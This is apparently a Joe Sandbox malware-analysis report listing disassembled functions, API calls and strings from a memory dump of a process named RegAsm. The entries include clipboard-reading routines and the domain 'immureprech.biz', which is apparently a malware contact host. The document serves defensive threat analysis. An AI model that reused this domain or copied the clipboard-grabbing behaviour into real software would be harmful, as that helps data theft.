Opcode Fuzzy Hash: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58

Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00431887
GetSystemMetrics.USER32 ref: 00431896

Strings

, xrefs: 0043196A

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Function 00435EA0 Relevance: 5.3, Strings: 4, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00435EB9
T, xrefs: 00435EB4
V, xrefs: 00435EBE
k, xrefs: 00435EAF

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: T$U$V$k
API String ID: 0-1255220828
Opcode ID: 3cc98e4c8ba408357a56dd5da8c2631a94b117a0f7445ac2aa6c666d2f659e02
Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
Opcode Fuzzy Hash: 3cc98e4c8ba408357a56dd5da8c2631a94b117a0f7445ac2aa6c666d2f659e02
Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B

Function 0040DD25 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040DD35

Strings

immureprech.biz, xrefs: 0040E06C
PT, xrefs: 0040DF63

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT$immureprech.biz
API String ID: 3861434553-2693025054
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55

Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 0043CBF5
ihgf, xrefs: 0043CC13

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @$ihgf
API String ID: 2994545307-73152791
Opcode ID: e8645669652d7f7de95e8985ed7f10f4c364daeafd1946bf51eda8febbb38cfd
Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
Opcode Fuzzy Hash: e8645669652d7f7de95e8985ed7f10f4c364daeafd1946bf51eda8febbb38cfd
Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A

Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00425A65

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 167H
API String ID: 2994545307-2704650348
Opcode ID: 38450cec291c2e1082ac86020033df8e189db766218c78d431ee3ea45677ee2a
Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
Opcode Fuzzy Hash: 38450cec291c2e1082ac86020033df8e189db766218c78d431ee3ea45677ee2a
Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A

Function 0043D830 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

cdef, xrefs: 0043D895

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: cdef
API String ID: 2994545307-4216504194
Opcode ID: 5812c35fa09ee1b791dfb97939491fa1d86feb7d209790cf53f0fe7174bd187e
Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
Opcode Fuzzy Hash: 5812c35fa09ee1b791dfb97939491fa1d86feb7d209790cf53f0fe7174bd187e
Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786

Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CD85

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 51c2d3c48bead1e24f978db54d90992c46589e6659c1f66f49beee17b18db219
Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
Opcode Fuzzy Hash: 51c2d3c48bead1e24f978db54d90992c46589e6659c1f66f49beee17b18db219
Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A

Function 00438EA0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6512a40469e740b689b861a79e551d6f343171b93302e1bf873b536c23dd207b
Instruction ID: 96e128fd99fbf524e2f3ef55e43501592b1a8fdc9f4199c5c04fa81f22471a0d
Opcode Fuzzy Hash: 6512a40469e740b689b861a79e551d6f343171b93302e1bf873b536c23dd207b
Instruction Fuzzy Hash: 96517276A083404FE718DA29CC51B2BB7E3EBD9314F19953EE5C297381DA799C01838A

Function 0043D0A0 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b47757b6906273ad02da9a725e591644371542262fb03aba45c268f1552915b2
Instruction ID: c6b6bb5faf057b6a68f3e5ff18d61b6d7d9c128f7451342645401fa614298587
Opcode Fuzzy Hash: b47757b6906273ad02da9a725e591644371542262fb03aba45c268f1552915b2
Instruction Fuzzy Hash: F3514831A083009FD7249F18E881A2BB7E2EFDD310F25A93DE58547351EA75DC51C74A

Function 0040C917 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A

Function 0043B05B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18222f22a9ab2b63a400fcffd4b3a34fd29f6efd4115da0d165384394debb5d
Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
Opcode Fuzzy Hash: b18222f22a9ab2b63a400fcffd4b3a34fd29f6efd4115da0d165384394debb5d
Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Function 0042C45C Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0ef8b023feb42744f45f8ed2eadfcdc6419d00c3a8250a073fef60970476071
Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
Opcode Fuzzy Hash: e0ef8b023feb42744f45f8ed2eadfcdc6419d00c3a8250a073fef60970476071
Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E

Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Strings

ilmn, xrefs: 0043AB7D

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID: ilmn
API String ID: 2020703349-1560153188
Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Function 0040EA11 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7

Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 781189d5fc44d07fd0e1f4904dd1cba3305d7db9618452ca2d76d837220d8f17
Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
Opcode Fuzzy Hash: 781189d5fc44d07fd0e1f4904dd1cba3305d7db9618452ca2d76d837220d8f17
Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

Function 0042E506 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E54C

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c163bcb05f7634e1a4fef36e32eb0508205d9d1b34f8db2584493d2ec9bc581a
Instruction ID: 73dc07478978cc97b4fa8368d249e84189bb1c85d8b76e8a997a211bfaa32886
Opcode Fuzzy Hash: c163bcb05f7634e1a4fef36e32eb0508205d9d1b34f8db2584493d2ec9bc581a
Instruction Fuzzy Hash: C9F0B7B41087018FD314DF28D4A8B1ABBE0EB89304F01881DE4968B3A0DB75AA49CF82

Function 00430D9D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00430DDD

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: ae4746ac1eb4dc45c24d96bd750e06fb844a26f4889db438f9403698b48dbf3c
Instruction ID: c20a79fc710e9b772a2336fa53249e87931ee1b57b699406dbd778e39ad0b615
Opcode Fuzzy Hash: ae4746ac1eb4dc45c24d96bd750e06fb844a26f4889db438f9403698b48dbf3c
Instruction Fuzzy Hash: 5DF098B4509342CFD314DF29C5A871BBBE0BBC4304F10892DE4958B290C7B59949CF86

Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Function 0040E648 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C

Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 972951d19d2b685253a3b5f37760d17634b32559eba37820a325e3d7b0dff9ca
Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
Opcode Fuzzy Hash: 972951d19d2b685253a3b5f37760d17634b32559eba37820a325e3d7b0dff9ca
Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Non-executed Functions

Function 0043462A Relevance: 127.9, Strings: 102, Instructions: 417COMMON

Download Yara Rule

Strings

i, xrefs: 004346C2
x, xrefs: 004346A6
v, xrefs: 0043467C
N, xrefs: 00434819
$, xrefs: 00434763
b, xrefs: 00434915
d, xrefs: 00434923
a, xrefs: 0043482E
<, xrefs: 0043479B
L, xrefs: 0043480B
D, xrefs: 00434843
m, xrefs: 00434B0E
@, xrefs: 00434827
1, xrefs: 004348BA
e, xrefs: 00434AEE
~, xrefs: 00434969
, xrefs: 00434747
>, xrefs: 00434858
*, xrefs: 0043471D
e, xrefs: 004346B4
l, xrefs: 004346EC
D, xrefs: 0043476A
P, xrefs: 00434897
c, xrefs: 00434AE6
H, xrefs: 004347EF
], xrefs: 00434962
%, xrefs: 00434866
v, xrefs: 004349A1
+, xrefs: 00434890
(, xrefs: 0043470F
k, xrefs: 00434B06
V, xrefs: 004348C1
x, xrefs: 0043493F
i, xrefs: 00434AFE
z, xrefs: 0043494D
M, xrefs: 00434636
0, xrefs: 004347B7
O, xrefs: 004347A2
., xrefs: 0043489E
2, xrefs: 004347C5
l, xrefs: 004348EB
), xrefs: 004347CC
r, xrefs: 00434985
4, xrefs: 004347D3
e, xrefs: 004346DE
t, xrefs: 00434993
&, xrefs: 00434771
Z, xrefs: 004347B0
4, xrefs: 00434BD3
F, xrefs: 00434851
B, xrefs: 00434835
-, xrefs: 00434652
t, xrefs: 004347E8
;, xrefs: 00434820
T, xrefs: 004348B3
j, xrefs: 004348DD
., xrefs: 00434739
n, xrefs: 004348F9
", xrefs: 00434755
}, xrefs: 00434882
N, xrefs: 00434740
,, xrefs: 0043472B
^, xrefs: 0043475C
\, xrefs: 0043487B
p, xrefs: 00434698
N, xrefs: 00434786
U, xrefs: 00434724
s, xrefs: 004348AC
C, xrefs: 0043491C
:, xrefs: 0043478D
%, xrefs: 0043468A
p, xrefs: 00434977
Z, xrefs: 00434794
Z, xrefs: 0043486D
f, xrefs: 00434931
~, xrefs: 004347BE
X, xrefs: 0043485F
=, xrefs: 00434812
\, xrefs: 00434716
[, xrefs: 00434778
., xrefs: 004348C8
o, xrefs: 00434B16
^, xrefs: 00434889
?, xrefs: 00434874
>, xrefs: 004347A9
8, xrefs: 0043477F
g, xrefs: 00434AF6
`, xrefs: 00434907
5, xrefs: 004346FA
;, xrefs: 004347F6
|, xrefs: 0043495B
J, xrefs: 004347FD
4, xrefs: 00434BF5
0, xrefs: 0043484A
6, xrefs: 004347E1
R, xrefs: 004348A5
h, xrefs: 004348CF
!, xrefs: 0043483C
t, xrefs: 00434644
?, xrefs: 004346D0
~, xrefs: 0043466E
e, xrefs: 00434708

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
API String ID: 0-1394229784
Opcode ID: 6b5e8a3ef8ba662cab324718d7720a18ae6b7cc4d250dd71ea4c109fb1e4a02b
Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
Opcode Fuzzy Hash: 6b5e8a3ef8ba662cab324718d7720a18ae6b7cc4d250dd71ea4c109fb1e4a02b
Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26

Function 00434098 Relevance: 36.6, Strings: 29, Instructions: 348COMMON

Download Yara Rule

Strings

C, xrefs: 004341BA
a, xrefs: 0043415A
{, xrefs: 00434331
d, xrefs: 0043417A
x, xrefs: 00434325
|, xrefs: 00434335
s, xrefs: 004341A2
n, xrefs: 00434162
+, xrefs: 004340A4
0, xrefs: 00434427
@, xrefs: 004341B2
<, xrefs: 004342CF
z, xrefs: 0043432D
n, xrefs: 004342FD
{, xrefs: 0043418A
f, xrefs: 0043431D
b, xrefs: 0043430D
:, xrefs: 004342F9
}, xrefs: 00434192
|, xrefs: 00434182
g, xrefs: 0043416A
`, xrefs: 00434305
>, xrefs: 004342D8
*, xrefs: 004340EA
p, xrefs: 0043419A
d, xrefs: 00434315
h, xrefs: 0043414A
`, xrefs: 00434142
w, xrefs: 004341AA

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
API String ID: 0-334816167
Opcode ID: fe3bbaaf78d73795ce0d9db7cf1905d738811f9555a388683196b7b178659806
Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
Opcode Fuzzy Hash: fe3bbaaf78d73795ce0d9db7cf1905d738811f9555a388683196b7b178659806
Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56

Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004310E0
GetWindowLongW.USER32 ref: 00431105
GetClipboardData.USER32 ref: 00431115
GlobalLock.KERNEL32 ref: 0043112E
GlobalUnlock.KERNEL32 ref: 00431240
CloseClipboard.USER32 ref: 00431249

Strings

], xrefs: 00431191
W, xrefs: 004311A5
(, xrefs: 004311BE
P, xrefs: 0043119B
x, xrefs: 0043117D
j, xrefs: 004311AA

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797

Function 00409230 Relevance: 18.0, Strings: 14, Instructions: 458COMMON

Download Yara Rule

Strings

p~rs, xrefs: 00409355
7]7N, xrefs: 0040938D
LSJm, xrefs: 0040939D
PVNR, xrefs: 00409395
`{R2, xrefs: 0040937D
; >?, xrefs: 00409280
agsy, xrefs: 0040936D
wkoq, xrefs: 00409385
rz|x, xrefs: 004096CE
9/,8, xrefs: 00409268
R:e}, xrefs: 00409375
<'=0, xrefs: 00409270
sD/f, xrefs: 0040935D
~p~9, xrefs: 00409365

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
API String ID: 0-2345621967
Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6

Function 0040F9FD Relevance: 17.1, Strings: 13, Instructions: 892COMMON

Download Yara Rule

Strings

@, xrefs: 0040FFD1
T, xrefs: 0040FC32
&, xrefs: 0040FBDB
Y, xrefs: 00410291
t, xrefs: 0040FFD9
g, xrefs: 0040FDEA
O, xrefs: 0040FEF0
\, xrefs: 00410289
Z, xrefs: 00410299
+, xrefs: 004103F8
q, xrefs: 0040FB73
C, xrefs: 0040FBE0
4, xrefs: 0040FC42

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
API String ID: 0-2174627302
